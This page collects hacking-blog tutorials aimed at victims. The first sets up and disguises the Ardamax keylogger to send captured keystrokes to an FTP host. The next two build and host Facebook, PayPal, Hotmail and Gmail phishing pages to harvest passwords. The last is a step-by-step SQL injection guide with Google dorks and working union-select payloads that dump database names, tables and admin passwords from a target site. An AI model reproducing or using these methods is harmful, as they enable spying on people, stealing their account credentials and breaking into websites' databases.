Hack Paypal Orkut Myspace Email Passwords Using Keylogger

online advertising

In my previous articles i had teach you how to hack twitter accounts password, android spy, and other hackers tips. But after a very long time i am going to make another cool article upon Orkut, Myspace, Paypal Hacking, Like i have posted many tutorials upon spywares and remote hacking. So today i am gonna show you how to hack a computer through a keylogger. This keylogger is known as Ardamax Keylogger, this is very old many anti viruses detects it, but it’s quiet cool and faster. 

Don’t forget to Subscribe to our RSS feed 

Hack Accounts By Ardamax Keylogger!

Step1. Download the Ardamax keylogger!

Step2. Install it on your drive after installation goto tray icon – click – Registration Code will be in the downloaded folder.
Step3. The Screen will be displayed with many of the options, select them all as shown below.

Step4. After This click next and select the password or secret code for privacy of your keylogger, use the difficult keys, and go ahead. Click on Send logs every 5 minutes as i have done, it’s up to you whether you want late or earlier. Delivery method should be FTP, select the whole happening in option include, and Html webpage. Size should be 50-100kb.
Step5. Enter the Ftp Host as the same, and remote folder with your own name choice, i like logs! Better test the Remote file with your email.

Step6. Now Check the options with your own choice, and choose the destination folder for your keylogger. But Dont Forget to change the icon, select the icon of music or video, so it should be more impressive.

That’s it now you can send the remote file to your victim’s computer for logs and private information.
Enjoy Hacking…

Send to other on facebook:

Comment Here:

online advertising

Hack Facebook AOL Paypal Accounts Using Super Phisher 2012

As in my previous articles i have mentioned many tips like hacking twitter account password, security issues, bypass antivirus detection and many different things. So today i am going to make another article on hacking Facebook Account using Super Phisher. Many readers are tired from getting the source code of login and making phishing resources. But today i will show you how to make any site phisher automatically.

How To Setup Super Phisher?

. Download From Here ( Password :- hackingguide )& Install it on your computer.
Step2. Your Internet Connection should be on.
Step3. Run the software.
Step4. Choose your own phishing site like facebook.com twitter.com paypal.com etc.
Step5. Name of password file should be password.txt, name of php must be login.php.
Step6. Site to redirect would be your choosen website like if you make facebook login page, you should redirect it to facebook.com.

Step7. Press Build Phisher Button, thats it. Now it will create the output files in C:drive.

Step8.  Upload Them to any free host or paid and get your victim’s private data including emails & passwords.
Enjoy Cool Hacking…

online advertising


Hotmail Hacking : How To Make Hotmail Phishing Site Tutorial

<!– CBeckAds_ad_Name = "17310"; CBeckAds_ad_Group = "None"; CBeckAds_ad_Width = 468; CBeckAds_ad_Height = 60; // –>

As We all knows, hotmail is getting more and more popular, so this is why it comes under hacker’s red zone. We have discussed many articles upon hacking hotmail account through keyloggers and Rats. But today i will teach you a quick tutorial on how to make a hotmail phishing site. What is phishing? Phishing is basically a fake login page which captures email and password of your victim and send the information to your web hosting. You only need to send the link of the phisher, rest of the work will automatically generate ( email and password ).

How To Make Hotmail Phishing Site?

1) Signup for a free web hosting :- http://www.000webhost.com/order.php

2) After signup, go to your email for confirmation of the signup. And logged in your account.

3) Go to Cpanel, and then file manager.

4) Now goto Public_html to upload the files!

5) Now upload the phishing pages!

That’s it now you can hack your victim by using this awesome page!
Download From Here
Enjoy Hacking….


online advertising

Gmail Hacking : How To Make Gmail Phishing Site? Tutorial Guide

After a long time, I am going to make another article on Gmail hacking, as we have discussed many of the tutorials on how to hack gmail account password using keyloggers, direct method etc. Today i am going to show you a quick tutorial on how to make a Gmail phishing ( Fake Login Page ) site.

Phishing is a fake login page of a particular site which captures email and password of the victim when he type it in the form. After capturing it would send all the information to hacker’s webhosting.

How To Make Phishing Site ? Easy Tutorial 

1) Goto free webhosting, if you have paid then you have to use that. I would recommend http://www.000webhost.com/order.php

2) Signup for free! after that goto your email for confirmation and sign in.

3) When you are logged in, Go to Cpanel, after that go to File manager for the creation of phishing page.

4) The menu will display now go to Public_html.

5) Now click upload, and upload the files to the hosting.

6) That’s it, you are done! Now goto your domain and you will see it would same like gmail login page. Send the link to your friends and Enjoy hacking.
To see the input information of your phishing page ( I mean your victim’s email and password ).
Go to :- http://www.yoursitesadress.p4o.net/lol.html

Download the phishing page From Here
EnjOoy hAcKinG!!!

online advertising

Hacking website using SQL Injection -step by step guide

Before we see what  SQL Injection is. We should know what SQL and Database are.

Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.

Some List of Database are:

* DB servers,
* MySQL(Open source),
* Oracle,
* Postgre SQL(open source),
* SQLite,

Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:

SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name “SQL” is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced “sequel,” but the alternate pronunciation
“S.Q.L.” is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:

Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,…) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values(“JuniorUrduHack”,”break”);

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let’s dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use “inurl:” command for finding the vulnerable websites.

Some Examples:

Here is the huge list of Google Dork

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.

Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(‘) at the end of the url and hit enter. (No space between the number and single quotes)

For eg:

 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sqlquery,then it is vulnerable. Cheers..!!
For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(‘) with “order by n” statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,…n. Until you get the error like “unknown column “.

For eg:

 change the number until you get the error as “unknown column”

if you get the error while trying the “x”thnumber,then no of column is “x-1”.

I mean:

 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the “–” at the end of the statement.
For eg:

Step 4: Displaying the Vulnerable columns:
Using “union select columns_sequence” we can find the vulnerable part of the table. Replace the “order by n” with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7–

If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7–

It will show some numbers in the page(it must be less than ‘x’ value, i mean less than or equl to number of columns).

Like this:

Now select 1 number.
It showing 3,7. Let’s take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with “version()”

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7–

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7–
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7–

If the above is not working,then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7–

Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with “group_concat(table_name) and add the “from information_schema.tables where table_schema=database()”

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()–
 Now it will show the list of table names. Find the table name which is related with the admin or user.

Now select the “admin ” table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sqlinection with version 4.

Step 7: Finding the Column Name

Now replace the “group_concat(table_name) with the “group_concat(column_name)”

Replace the “from information_schema.tables where table_schema=database()–” with “FROM information_schema.columns WHERE table_name=mysqlchar–

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBaraddon:
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.

Copy and paste the code at the end of the url instead of the “mysqlchar”
For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.

Now replace the ” from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)” with the “from table_name”

For eg:

and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin–

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.


Step 8: Finding the Admin Panel:
Just try with url like: